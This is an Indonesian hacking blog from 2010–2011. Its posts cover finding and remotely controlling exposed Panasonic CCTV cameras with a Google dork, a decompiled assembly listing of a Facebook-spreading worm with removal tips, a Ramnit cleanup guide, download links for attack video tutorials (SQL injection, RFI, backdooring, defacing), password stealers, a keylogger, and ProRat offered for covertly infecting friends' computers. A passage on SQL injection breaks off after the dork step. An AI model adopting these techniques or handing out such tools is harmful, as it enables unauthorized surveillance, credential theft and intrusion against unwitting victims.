Rabu, 28 Desember 2011

HACKING CCTV PANASONIC

HACKING CCTV PANASONIC
awalnya sih hanya iseng pingin lihat cctv online punya DLLAJ dan kepolisian. eh ternyata disitusnya bukan yg real time tetapi direkam diserver kemudian baru diupload kewebsite. nah dari situlah saya pingin langsung dapetin gambar secara real time tanpa harus masuk kesebuah website.
setelah googling sana sini dapat beberapa ip cctv yang memang sudah di publish sama yg bikin blog. cuma dipikir pikir kok cuma sedikit. jadi ga puas deh.
nah untuk lebih jelasnya simak caranya sebagai berikut :
1. ketikan di google ==>   inurl:CgiStart?page=
2. biasanya google akan merespon anda dengan lalulintas komunikasi yang tidak layak. dan disuruh memasukan kata kata tertentu. kamu ikuti saja. biasanya google akan meminta 2x verifikasi kata.
3. nah tara..... setelah melewati verifikasi dari google munculah banyak pilihan. pilih aja salah satu.
4. jreng.... munculah cctv target....
5. ada beberapa yg bisa kita ambil kendali termasuk digeser kanan dan kiri, atas serta bawah. tapi jangan ketahuan admin yah... bisa di ban  ip kamu.
ok sekian tutorial hacking cctv online. gunakan dengan bijak yah

Selasa, 04 Oktober 2011

VIRUS TROJAN MENYEBAR VIA CHAT FB

pernahkah kamu mendapat chat seperti diatas? atau yang seperti dibawah ini?
berhati hatilah karena chat tersebut sebenarnya sedang mengirimkan link untuk mendownload virus. kamu jangan tergoda dengan file .JPG karena sebenarnya bukan foto sama sekali melainkan file virus dengan aplikasi ms.dos.
virus tersebut dibuat dengan menggunakan bahasa assembly. berikut adalah hasil decompile dari si virus tersebut:
n004010EF()
   push   ebp
   mov   ebp,esp
   sub   esp,10
   push   ebx
   push   esi
   xor   ecx,ecx
   xor   esi,esi
   push   edi
   mov   dword ptr [ebp-0C],ecx
   xor   ebx,ebx

l00401101:
   mov   eax,ecx
   cdq
   push   0F
   pop   edi
   idiv   edi
   mov   byte ptr [ecx+00417DB0],cl
   inc   ecx
   cmp   ecx,00000100
   mov   al,[edx+00416FC4]
   mov   byte ptr [ecx+004182BF],al
   jl   00401101

l00401124:
   xor   eax,eax
   mov   edi,000000FF

l0040112B:
   movzx   edx,byte ptr [eax+00417DB0]
   movzx   ecx,byte ptr [eax+004182C0]
   add   edx,ebx
   add   ecx,edx
   and   ecx,edi
   mov   ebx,ecx
   lea   ecx,[ebx+00417DB0]
   mov   dl,[ecx]
   xor   byte ptr [eax+00417DB0],dl
   mov   dl,[eax+00417DB0]
   xor   byte ptr [ecx],dl
   mov   cl,[ecx]
   xor   byte ptr [eax+00417DB0],cl
   inc   eax
   cmp   eax,00000100
   jl   0040112B

l00401167:
   mov   ebx,[ebp+08]
   push   ebx
   call   dword ptr [0041300C]
   xor   eax,eax
   cmp   byte ptr [ebx],al
   mov   dword ptr [ebp-04],eax
   jz   00401185

l0040117A:
   inc   dword ptr [ebp-04]
   mov   ecx,[ebp-04]
   cmp   byte ptr [ecx+ebx],al
   jnz   0040117A

l00401185:
   cmp   dword ptr [ebp-04],eax
   mov   dword ptr [ebp-08],eax
   jle   004012EF

l00401191:
   inc   bx
   mov   eax,eax
   or   bx,ax
   dec   bl
   ror   cl,1C
   dec   eax
   sub   cx,ax
   sub   eax,00
   inc   eax
   xor   eax,ebx
   not   bl
   neg   bx
   inc   ebx
   mov   bx,bx
   xor   cl,al
   sub   eax,ecx
   xor   bl,F6
   nop
   inc   esi
   and   esi,edi
   movzx   eax,byte ptr [esi+00417DB0]
   add   eax,[ebp-0C]
   and   eax,edi
   mov   dword ptr [ebp-0C],eax
   lea   eax,[eax+00417DB0]
   mov   cl,[eax]
   xor   byte ptr [esi+00417DB0],cl
   mov   cl,[esi+00417DB0]
   xor   byte ptr [eax],cl
   mov   cl,[eax]
   xor   byte ptr [esi+00417DB0],cl
   movzx   eax,byte ptr [eax]
   movzx   ecx,byte ptr [esi+00417DB0]
   add   eax,ecx
   mov   ecx,[ebp+08]
   and   eax,edi
   mov   dl,[eax+00417DB0]
   mov   eax,[ebp-08]
   add   eax,ecx
   cmp   dl,[eax]
   mov   byte ptr [00417A71],dl
   mov   dword ptr [ebp-10],eax
   jnz   00401219

l00401211:
   xor   dl,dl
   mov   byte ptr [00417A71],dl

l00401219:
   ror   bx,19
   not   eax
   sub   al,00
   or   bx,ax
   not   ecx
   and   al,bl
   sub   bx,1B
   ror   cx,1B
   add   ax,cx
   ror   ecx,10
   and   cx,FF
   add   eax,000000B2
   neg   ecx
   xor   al,cl
   or   bl,1D
   shl   bl,12
   sar   bl,14
   and   ax,FFFF
   and   eax,ecx
   not   eax
   dec   ebx
   or   eax,ecx
   not   cl
   ror   bx,02
   shl   ebx,03
   or   eax,00
   shl   bl,1B
   ror   bl,0D
   sub   al,00
   xor   cx,ax
   ror   ecx,1C
   or   eax,00
   add   al,00
   not   ecx
   inc   cl
   not   bx
   inc   bx
   sar   bl,17
   ror   cl,04
   nop
   ror   cx,05
   and   ecx,09
   ror   ebx,15
   xor   bl,cl
   inc   ecx
   sub   eax,00
   shl   cx,06
   and   bl,al
   inc   bx
   or   bx,00
   inc   eax
   ror   bl,10
   shl   bx,1B
   and   cx,0D
   shl   bx,04
   shl   cl,1A
   and   ecx,eax
   neg   bl
   nop
   inc   ebx
   and   bl,FF
   sar   cx,13
   ror   bl,09
   sub   eax,ebx
   ror   ebx,19
   add   eax,3F
   not   bx
   shl   ax,13
   dec   bx
   add   al,cl
   mov   eax,[ebp-10]
   xor   byte ptr [eax],dl
   inc   dword ptr [ebp-08]
   mov   eax,[ebp-08]
   cmp   eax,[ebp-04]
   jl   00401191

l004012EC:
   mov   ebx,[ebp+08]

l004012EF:
   pop   edi
   pop   esi
   mov   eax,ebx
   pop   ebx
   leave
   ret

fn004012F6()
   mov   eax,[004183CC]
   push   00416D64
   push   eax
   call   dword ptr [00413014]
   push   40
   push   00003000
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   call   eax
   ret

fn0040131D()
   push   00416D40
   push   dword ptr [esp+10]
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn00401337()
   mov   eax,[004183CC]
   push   00416FD4
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+0C]
   xor   ecx,ecx
   push   dword ptr [esp+0C]
   mov   dword ptr [004183D0],eax
   push   ecx
   push   ecx
   push   04
   push   ecx
   push   ecx
   push   ecx
   push   dword ptr [esp+24]
   push   ecx
   call   eax
   ret

fn00401366()
   mov   eax,[004183CC]
   push   00416D88
   push   eax
   call   dword ptr [00413014]
   push   00
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   push   dword ptr [esp+14]
   call   eax
   ret

fn0040138C()
   mov   eax,[004183CC]
   push   00416DAC
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn004013A8()
   mov   eax,[004183CC]
   push   00416DD0
   push   eax
   call   dword ptr [00413014]
   push   dword ptr [esp+08]
   push   dword ptr [esp+08]
   call   eax
   ret

fn004013C4()
   mov   edx,[004183CC]
   push   ebx
   dec   cl
   inc   bx
   or   bx,16
   shl   cx,15
   neg   ecx
   or   ax,bx
   sub   bl,DE
   not   ecx
   ror   cl,16
   shl   ax,1A
   shl   cx,0B
   or   eax,04
   inc   ebx
   or   eax,ebx
   and   eax,FF
   inc   cx
   sar   al,07
   sub   bl,cl
   ror   al,18
   and   bx,14
   sub   eax,00
   shl   bx,0B
   and   bl,06
   add   ebx,ecx
   and   bx,FF
   or   al,cl
   push   00416F38
   push   edx
   call   dword ptr [00413014]
   mov   edx,eax
   not   ebx
   neg   eax
   add   bx,00
   not   bx
   ror   cl,09
   sar   al,1B
   shl   cl,14
   ror   bx,0E
   inc   ecx
   ror   ax,12
   shl   bl,18
   sub   eax,07
   and   ecx,ebx
   nop
   shl   al,16
   ror   eax,12
   sub   cl,02
   ror   bl,05
   ror   eax,02
   or   bx,02
   sub   bx,00
   sar   ebx,07
   neg   eax
   xor   eax,66
   ror   cl,1C
   neg   eax
   inc   cl
   dec   ecx
   inc   eax
   and   bl,cl
   ror   eax,0F
   mov   bl,bl
   nop
   shl   eax,16
   neg   cl
   inc   bl
   not   eax
   add   ebx,3F
   ror   ecx,08
   sub   al,00
   nop
   shl   ecx,09
   sar   bx,1A
   ror   bl,0F
   and   ecx,06
   not   cl
   ror   eax,08
   not   bl
   shl   eax,04
   ror   al,0E
   sub   bl,E7
   add   cx,62
   or   ecx,ebx
   ror   eax,02
   and   ebx,18
   xor   ecx,000000E0
   or   ax,bx
   shl   bl,10
   xor   eax,0000009A
   sar   ecx,13
   neg   ebx
   ror   bx,18
   neg   al
   ror   ebx,1C
   neg   ax
   push   dword ptr [esp+08]
   call   edx
   pop   ebx
   ret

fn004014DE()
   push   ecx
   push   ebx
   push   ebp
   push   esi
   push   edi
   mov   edi,eax
   not   bx
   ror   cl,09
   sar   al,1B
   shl   cl,14
   ror   bx,0E
   inc   ecx
   ror   ax,12
   shl   bl,18
   push   00416FD4
   call   004010EF
   pop   ecx
   add   bl,al
   neg   eax
   xor   cl,al
   sub   bx,00
   shl   al,14
   not   cx
   mov   eax,eax
   or   ecx,ebx
   ror   bl,1E
   sub   al,cl
   xor   ecx,ebx
   sar   al,0F
   sub   bx,0E
   or   bx,01
   neg   ax
   not   ebx
   neg   eax
   add   bx,00
   push   00416D40
   call   004010EF
   pop   ecx
   ror   bl,0B
   and   eax,11
   push   00416D64
   call   004010EF
   pop   ecx
   inc   ebx
   dec   bl
   nop
   not   ebx
   dec   eax
   neg   eax
   add   eax,00
   and   eax,FF
   and   bx,14
   add   eax,ecx
   sub   ebx,00
   or   eax,00
   neg   cx
   or   ax,001A
   mov   bl,bl
   xor   eax,0000009E
   inc   cl
   push   00416D88
   call   004010EF
   pop   ecx
   and   cl,bl
   add   bl,91
   shl   ebx,14
   sub   ecx,00
   xor   ebx,ecx
   ror   al,01
   neg   bl
   shl   ax,1B
   ror   bx,02
   dec   bl
   ror   bl,17
   or   eax,14
   sub   al,00
   ror   ebx,09
   neg   eax
   not   bl
   xor   al,cl
   shl   eax,0E
   push   00416DAC
   call   004010EF
   pop   ecx
   not   cx
   sar   bl,01
   dec   cl
   dec   al
   ror   ecx,0F
   or   bl,cl
   add   cl,00
   ror   ecx,07
   inc   ebx
   not   eax
   sub   cx,bx
   dec   eax
   sub   eax,00
   neg   eax
   sub   cl,00
   or   bl,00
   shl   ebx,13
   sub   ax,bx
   not   ebx
   inc   bx
   and   al,bl
   mov   bx,bx
   neg   ecx
   sub   bx,cx
   push   00416DD0
   call   004010EF
   mov   dword ptr [esp],00416DF4
   call   004010EF
   mov   ebp,00416F5C
   push   ebp
   call   004010EF
   mov   esi,[00413018]
   pop   ecx
   pop   ecx
   push   00416CB0
   call   esi
   push   00416D1C
   mov   dword ptr [004183CC],eax
   call   esi
   mov   dword ptr [esp+10],eax
   and   ax,0001
   sar   bx,14
   shl   al,09
   ror   ecx,0B
   or   bl,00
   dec   bx
   add   ebx,ecx
   neg   eax
   ror   bl,17
   not   al
   or   cx,00
   dec   ax
   ror   bl,0E
   inc   al
   push   ebp
   push   dword ptr [004183CC]
   call   dword ptr [00413014]
   mov   dword ptr [00417D68],00000044
   mov   dword ptr [00417A90],00010007
   cmp   word ptr [edi],5A4D
   mov   dword ptr [004183C8],edi
   jnz   00401773

l00401698:
   mov   esi,[edi+3C]
   add   esi,edi
   cmp   dword ptr [esi],00004550
   jnz   00401773

l004016A9:
   push   00417EB0
   push   00417D68
   call   eax
   push   eax
   call   00401337
   push   dword ptr [esp+1C]
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   0040131D
   push   dword ptr [esi+50]
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   004012F6
   push   dword ptr [esi+54]
   push   edi
   push   dword ptr [esi+34]
   push   dword ptr [00417EB0]
   call   00401366
   xor   ebp,ebp
   add   esp,34
   xor   ebx,ebx
   cmp   word ptr [esi+06],bp
   jbe   0040173D

l004016FD:
   mov   eax,[004183C8]
   mov   eax,[eax+3C]
   add   eax,ebp
   lea   eax,[eax+edi+000000F8]
   push   dword ptr [eax+10]
   mov   ecx,[eax+14]
   mov   dword ptr [00417A7C],eax
   mov   eax,[eax+0C]
   add   eax,[esi+34]
   add   ecx,edi
   push   ecx
   push   eax
   push   dword ptr [00417EB0]
   call   00401366
   movzx   eax,word ptr [esi+06]
   add   esp,10
   inc   ebx
   add   ebp,28
   cmp   ebx,eax
   jl   004016FD

l0040173D:
   mov   edi,00417A90
   push   edi
   push   dword ptr [00417EB4]
   call   0040138C
   mov   eax,[esi+28]
   add   eax,[esi+34]
   push   edi
   push   dword ptr [00417EB4]
   mov   dword ptr [00417B40],eax
   call   004013A8
   push   dword ptr [00417EB4]
   call   004013C4
   add   esp,14

l00401773:
   pop   edi
   pop   esi
   pop   ebp
   pop   ebx
   pop   ecx
   ret

fn00401779()
   push   ebx
   push   ebp
   push   esi
   push   edi
   ror   cx,07
   shl   al,03
   push   00416CB0
   call   dword ptr [00413018]
   mov   edi,eax
   and   bl,FF
   mov   esi,[00413014]
   push   00416E3C
   push   edi
   call   esi
   mov   dword ptr [004183D4],eax
   shl   bl,15
   push   00416E60
   push   edi
   call   esi
   mov   dword ptr [004184DC],eax
   ror   bx,06
   push   00416E84
   push   edi
   call   esi
   mov   dword ptr [004184E0],eax
   mov   eax,eax
   push   00416EA8
   push   edi
   call   esi
   mov   dword ptr [004184E4],eax
   neg   ecx
   mov   eax,[004183D4]
   xor   ebp,ebp
   cmp   eax,ebp
   jz   0040184F

l004017E4:
   cmp   dword ptr [004184DC],ebp
   jz   0040184F

l004017EC:
   cmp   dword ptr [004184E0],ebp
   jz   0040184F

l004017F4:
   and   bl,al
   movzx   ecx,word ptr [esp+14]
   push   00000118
   push   ecx
   push   ebp
   call   eax
   mov   esi,eax
   add   cx,64
   cmp   esi,ebp
   jnz   00401813

l0040180E:
   shl   bl,02
   jmp   00401852

l00401813:
   add   bx,cx
   push   esi
   push   ebp
   call   dword ptr [004184E0]
   mov   edi,eax
   and   bl,07
   cmp   edi,ebp
   jnz   0040182B

l00401827:
   xor   ecx,ebx
   jmp   00401852

l0040182B:
   and   cx,ax
   push   esi
   push   ebp
   call   dword ptr [004184DC]
   mov   dword ptr [004184F8],eax
   inc   bl
   push   edi
   call   dword ptr [004184E4]
   mov   dword ptr [004184FC],eax
   and   ecx,eax
   mov   al,01
   jmp   00401854

l0040184F:
   ror   al,1D

l00401852:
   xor   al,al

l00401854:
   pop   edi
   pop   esi
   pop   ebp
   pop   ebx
   ret

fn00401859()
   push   ebx
   mov   ebx,[004184E8]
   push   ebp
   mov   ebp,[004184EC]
   push   esi
   push   edi
   push   00416CB0
   call   dword ptr [00413018]
   mov   esi,[00413014]
   mov   edi,eax
   push   00416ECC
   push   edi
   call   esi
   push   00416EF0
   push   edi
   mov   dword ptr [00417A88],eax
   call   esi
   push   00416F14
   push   edi
   mov   dword ptr [004183C0],eax
   call   esi
   test   ebx,ebx
   mov   dword ptr [00417DAC],eax
   push   ebp
   jz   004018B6
---------------------------------------------------------------


Hebatnya, akun Facebook yang di infeksi oleh virus tidak mengalami perubahan sama sekali. Bahkan tidak ada pop up FB Chat yang terbuka. Yang dibutuhkan oleh virus ini hanyalah akun Facebook tersebut sedang login saja. Kemungkinan besar hal ini terjadi supaya korban virus tidak menyadari kalau komputernya telah terinfeksi oleh Kolab/Click1 dan menyebarkan banyak sekali FB Chat ke kontak-kontak Facebooknya yang mengarahkan untuk mendownload virus ini.

Jika Anda meng-klik link pada pesan chat tersebut, maka secara otomatis file akan terdownload ke dalam komputer Anda. Dan jika Anda menjalankan file tersebut, maka komputer Anda sudah pasti telah terinfeksi.

Sulit dibasmi dan menyebabkan BSOD (Bumi Serpong Ooo Damai ??.. :p)
Kolab/Click1 tidak berjalan pada proses atau services Windows, sehingga sulit menemukan dan mematikan keberadaan worm/rootkit ini. Tetapi, worm ini justru mendompleng atau menumpang pada file svchost.exe milik Windows, sehingga Anda akan sulit mematikan-nya. Jika Anda memaksa mematikan file svchost.exe, komputer akan mengalami blue screen of death / BSOD. Termasuk jika Anda mencoba melakukan scan menggunakan tools tertentu seperti GMER, tools yang biasa digunakan untuk mendeteksi rootkit. (lihat gambar 6)
Gambar 6, Berusaha mematikan file svchost yang telah didompleng, akan muncul BSOD

Broadcast ke IP-IP tertentu
Walaupun tidak berjalan pada proses atau services Windows, Kolab/Click1 memanfaatkan file svchost.exe Windows, untuk melakukan broadcast pada IP-IP tertentu. (lihat gambar 7)
Gambar 7, Aktivitas broadcast yang dilakukan oleh Kolab/Click1

Mencantumkan diri-nya pada Windows Firewall
Agar dapat berjalan bebas tanpa hambatan, Kolab/Click1 mendaftarkan programnya pada Windows Firewall, sehingga diperbolehkan untuk melakukan koneksi dan broadcast. (lihat gambar 8)
Gambar 8, Aktivitas broadcast yang dilakukan oleh Kolab/Click1



Tips Hindari Kolab/Click1
Berikut beberapa tips bagi Anda jika tidak ingin terinfeksi dan menjadi korban dari worm/rootkit ini
  1. Hindari melakukan klik pada link yang dikirim pada Anda, baik melalui pesan chat FB atau status.
  2. Beritahukan pada teman Anda, bahwa komputer tersebut telah terinfeksi virus, dan segera lakukan update dan scan komputer dengan antivirus yang terupdate.
  3. Jangan melakukan copy link atau melakukan pemberitahuan disertai link tersebut, karena dengan begitu Anda justru ikut menyebarkan link yang mengandung virus tersebut.
  4. Jangan meninggalkan FB Anda dalam keadaan aktif/login, sebaiknya Anda logout dahulu hingga Anda kembali.
  5. Gunakan Secure HTTP / HTTPS pada saat Login FB, hal ini agar FB Anda tidak mudah diakses oleh orang lain disekitar Anda.

    Apa yang harus dilakukan jika sudah terlajur terinfeksi?
    Apabila kita sudah terlanjur menjalankan file virusnya, sudah pasti komputer yang kita gunakan akan terinfeksi virus tersebut. Beberapa hal yang bisa kita lakukan sebagai langkah awal pertolongan pertama mungkin bisa melakukan beberapa langkah berikut:
    1. Tutup akun facebook ( dalam hal ini Logout dari akun facebook) untuk mencegah penyebaran lebih banyak ke teman-teman facebook kita.
    2. Pastikan di Komputer anda terinstall program Antivirus (disarankan ativirus luar), dan lakukan update database ke versi paling terbaru.
    3. Matikan koneksi internet, kemudian lakukan full sistem scan di komputer menggunakan Antivirus yang sudah terupdate tadi, jika ada beberapa file yang terdeteksi (biasanya W32/Kolab.xxx atau Trojan.Click1.xxxx) kita bisa menghapusnya atau untuk keamanan kita bisa meng-karantina (quarentine) file yang dicurigai sebagai virus.
    4. Restart komputer. Untuk memastikan keadaan sistem komputer kita, bisa lakukan lagi full sistem scan setelah komputer di restart.
    Ini tidak menjamin komputer akan bebas 100% dari infeksi virus tersebut, semua tergantung kemampuan dari masing-masing antivirus yang digunakan. Dari beberapa sumber mengatakan, w32/kolab yang menyebar melaui chat facebook ini merupakan varian terbaru dari worm kolab (worm jaringan) yang sudah lama menyebar. Jadi untuk saat ini masih sulit dibersihkan.
    Berikut ini saya sertakan hasil deteksi beberapa antivirus terhadap virus tersebut.




Sabtu, 23 Juli 2011

MEMBERANTAS VIRUS RAMNIT

Memang Virus Ramnit adalah Virus yang sangat cepat penularannya , tetapi bagaimanapun hebatnya sesuatu pasti ada kelemahannya…. :)

Disini saya akan menjelaskan dengan tuntas bagaimana Virus ramnit bekerja… sekaligus cara mengatasinya…

Virus Ramnit.. :

  1. Virus yang menginjeksi file .html , .exe dan .dll
  2. Virus yang menular melalui removable disk ( UFD ) dengan cara mengcopy file .cpl dan .exe yang selalu bertambah dan berubah-ubah namanya.Yang tepatnya file tersebut berada di dalam folder Recycler… dan 4 file shortcut copy of yang akan menjalankan file *.cpl infektor yang terdapat di folder recycler UFD.
  3. Bila Virus tersebut telah meng-infeksi system komputer , virus tersebut akan membuat dan menjalankan file svchost.exe yang akan melakukan berbagai hal: a. membuat file bernama : watermark.exe yang bertempat di folder : C:\programfiles\mikrosoft\watermark.exe. b. merubah registry userinit.exe mejadi menjalankan : watermark.exe , sehingga virus tersebut menguasai sistem secara permanen , dengan cara menginfeksi file berekstensi .exe , . dll dan .html
  4. Jika di properties , UFD akan terlihat banyak terpakai oleh file .cpl dan .exe di folder recycler.

Efeknya:

  1. Virus ramnit akan membuat file program tidak berjalan dengan normal , misalnya: mozilla firefox , winamp dll
  2. kita tidak bisa menghapus file watermark.exe yang ada difolder c:\programfiles\microsoft\watermark.exe , dikarenakan file tersebut dikunci oleh file svchost.exe-nya virus ramnit.
  3. bila kita hapus file / folder yang ada didalam folder recycler UFD , file .cpl dan .exe akan muncul kembali.. dan terus menulis kembali…
  4. untuk system yangtelah terinfeksi file tertentu.. misalnya : explorer.exe akan digantikan explorermgr.exe
  5. bila kita membersihkan virus ini tidak tuntas ( ada yang belum dibersihkan ) , Virus ini akan kembali bila kita menjalankan aplikasi ( misalnya : klik kanan ).

Cara membersihkannya:

  1. Siapkan cleaner Anti Virus ( saya menggunakan NOD32 stand alone ) dengan cara >download disini< dan simpan dalam bentuk file zip / RAR agar file exe tersebut tidak terinfeksi virus.
  2. Simpan file tersebut di UFD atau copy paste di harddisk komputer yang telah terinfeksi.
  3. Gunakan task manager , pilih task / tab processes dan end task semua file svchost.exe dan juga semua yang bisa di end task ( kecuali : task managernya )
  4. Open file cleaner NOD32 yang sudah berbentuk zip /RAR , dengan menggunakan file open di task manager.Rubah pilihan program di open file menjadi allfiles agar file zip / rar dari NOD32 bisa terlihat.
  5. setelah teropen NOD32 dengan winrar atau aplikasi lainnya.. silakan dobel klik file nod*.exe setelah next…next dipilihan action , sebelah kiri pilih Clean dan sebelah kanan pilih delete.Lalu jalankan Scan & clean
  6. setelah berjalan close / tutup winrar / aplikasi yang dibuat membuka NOD32 zip / RAR.
  7. Silakan diawasi dengan task manager bila ada file svchost.exe keluar / tampil di processes segera di end task… dan seperti biasa bila ada tampilan windows yang memperingatkan bahwa komputer akan shutdown dalam waktu 60 detik / 1 menit…. silakan ketik di menu file open /run : shutdown -a yang artinya -a adalah perintah shutdown untuk membatalkan aksinya…
  8. Peringatan!!!!! , disaat NOD 32 membersihkan file di komputer anda , jangan sampai membuka / menjalankan file apapun… karena jangankan menjalankan file exe , kita klik kanan aja sudah berarti menjalankan virus / svchost.exe-nya Virus Ramnit.
  9. Ingat… yang perlu kita jaga adalah : mematikan / end task file svchost.exe selama NOD32 membersihkan file di komputer kita…..

Antisipasi Virus RAmnit:

Untuk menjaga Virus sejenis ramnit agar tidak kembali meng-infeksi komputer kita… disini saya sertakan berbagai trik… diantaranya:

  1. Matikan autorun.inf windows bisa berbagai macam cara : dengan menggunakan gpedit.msc>>administrative template>>turn off auto play>>enable>>alldrive , atau menggunakan regedit silakan baca : agar virus tidak masuk melalui flash disk
  2. Rubah beberapa ektensi file yang berpotensi digunakan oleh virus dengan assosiasi file ( misalnya: assoc .vbs=txtfile ) terutama untuk Virus ramnit adalah ekstensi .cpl
  3. Hapus selalu folder recycler didalam UFD , bila tidak bisa ada kemungkinan komputer kita terinfeksi Virus…
  4. Dan hapus dengan menggunakan mini windows Xp ( hiren BOOt CD ) atau system berbasis linux , folder recycler dan _restore yang ada di folder systeminformation
  5. Install Anti virus dengan Update database terbaru… dan usahakan anti viru tersebut diupdate databasenya.. baik secara online ataupu offline.. :)

Disini saya sertakan beberapa file buatan saya yang berfungsi untuk mempermudah setting windows…

  1. NOD32 dari:ziddu.com
SUMBER : http://mpu4elcom.net/2011/04/19/cara-membersihkan-virus-ramnit-mudah-dan-tuntas/

Jumat, 17 Juni 2011

VIDEO HACKING

ALL VIDEO HACKING

Untuk yg sdah mengenal dunia deface mungkin tutorial ni sangatlah tidak asing lagi...B Tapi bwat yang newbie mungkin ini sangat bermanfaat....silahkan disedot video'y tutor'y

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Phpmyadmin

4shared.com/file/pz7Ozrjr/phpmyadmin.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Cpanel Hacking

4shared.com/file/G3pXG06c/C_p4nel.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Brute Force

4shared.com/file/NT-NDbjs/tutoraccountBruteForce.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Joomla Reset Password

4shared.com/file/MIecxKVa/joomla_reset_pass.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - RFI Metode + Patch

4shared.com/file/Ov_3yd9W/RFI_Patc.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - LFI (Local file disclosure)

4shared.com/file/jSmkcNrR/L_F_I.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli + Backdoring

4shared.com/file/8mmHwxxW/SQLi_B4CKd0r.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Deface with HTML

4shared.com/file/hkxQik5C/DefacHTML-Injec.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli V.4

4shared.com/file/IBQ-RZU1/S-v4.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli V.5

4shared.com/Tutorial_SQL_Injection.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Jumping

4shared.com/file/Agmx67u5/JumP_N4ck0.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Metasploit

4shared.com/file/fx87EhEY/tutor_metas.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Rooting

4shared.com/file/Z7YF5ahj/R00tin9.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Asp Sql inj_TUTOR

4shared.com/file/X60x9df6/asp-sql-inj_TUTOR.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Scemafuzzy

4shared.com/file/FDOJKC3d/Scema.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Backdoring + Inject + Deface

4shared.com/file/QMSTE8zc/_2__BackInjectDef.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Sqli Malingsial Version

4shared.com/file/xfy-al-Q/Malingsial.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Patching Joomla

4shared.com/file/a_GUfnkm/joomla_patch.html

---------------------------------------------------------------------

---------------------------------------------------------------------

Hacking Video Tutorial - Defacing Tutorial

4shared.com/file/Hu4IxoNG/Defac-Tutor.html

---------------------------------------------------------------------

-----------------------------------------------------------------

PROGRAM SPY ( MATA MATA )

Pernah dengar tentang program mata mata yang biasa dipakai oleh FBI dan agen rahasia lainya?
berikut ini akan saya berikan 2 buah program mata mata (spy)
1. pasword fox, program ini akan menunjukan semua jenis pasword yang terekam pada firefox. cara kerjanya yaitu anda tinggal klik file aplikasinya maka program ini akan otomatis mencari pasword dari user yang pernah menggunakan firefox tersebut. berhati hatilah jika ada teman kamu yang pinjam laptopmu. bisa jadi di flashdisknya ada program ini. karena programnya yg portabel sehingga dapat disimpan di FD dan tinggal dijalankan saja.
2. google pasword decripter, program ini juga hampir sama dengan yang diatas hanya ada 2 macam yg portabel dan non portabel.
program diatas sangat berbahaya dan saya tidak bertanggungjawab atas pemakaian oleh orang yang tidak bertanggung jawab.
saran saya jangan pernah klik remember / ingat saya pada saat anda log in di sebuah website dengan user name dan paswordnya
waspadalah...... waspadalah...... waspadalah......
oh iya ini saya masih punya 11 tools mata mata yang biasa dipakai oleh agen FBI dan agen rahasia lainya silahkan kalian pelajari sendiri heheheheh. males jelasinya kebayakan. silahkan download di : http://www.ziddu.com/download/15384974/11FBITools.rar.html
saya tidak bertanggung jawab atas pemakaian dan penggunaan program ini. jika anda memakai berarti anda paham akan resikonya

KEYLOGER DAN ANTI KEYLOGER

sudah pernah dengar keyloger ? yah program yang dapat merekam semua aktivitas yang kita lakukan. baik membuka program menulis email maupun mamasukan pasword dan program ini berjalan tanpa diketahui oleh pemilik komputer. berhati hatilah jangan sampai komputer kamu disisipi program ini karena semua rahasiamu akan terbongkarbagi yang ingin mencoba keyloger silahkan download di : http://www.ziddu.com/download/15384668/setup.exe.html

terus gimana kalo sampai kenakeylogger? kamu jangan panik ada anti keyloger namanya keyscrumbler. yang mau anti keylogger silahkan didownload :http://www.ziddu.com/download/12667956/KeyScrambler_Setup.exe.html

Sabtu, 08 Januari 2011

HACKING WITH PRORAT

Bagi kamu yang suka iseng ngejahilin komputer teman, nih aku kasih tools yang cocok buat kamu. Namanya ProRat. ProRat adalah salah satu tool hacking yang sangat luar biasa sekali. Tools ini buatan orang Turkey. Tools ini berfungsi untuk menyusup ke komputer orang lain. Caranya sangat gampang dan mudah sekali, tinggal kita mengetahui IP dan Port komputer korban saja, maka kita dapat langsung menginfeksinya. Selamat mencoba
download Disini

Jumat, 03 Desember 2010

Hack Website menggunakan SQL injection

Hack Website menggunakan SQL injection

Hai teman teman berikut ini adalah cara Web attack (hack website) menggunakan cara SQL injection. Ok langsung saja bisa kamu lihat di bawah ini :

1. Menemukan target

Kita dapat menemukan calon korban dengan bantuan search engine (Google masih yang terbaik) dengan memanfaatkan pola-pola tertentu. Pola-pola inilah yang disebut dengan Dork. Dork yang kita gunakan adalah untuk mencari pola yang berhubungan dengan SQL (Database) maka dork ini sering juga disebut dengan SQL Dork.

N0LDR
“Hal di atas merupakan alasan kuat bagi Admin untuk selalu update dengan isu keamanan karena kita bias saja menjadi korban walaupun kita tidak memiliki musuh. Dengan masuk ke daftar hasil pencarian maka kita telah menjadi calon korban”

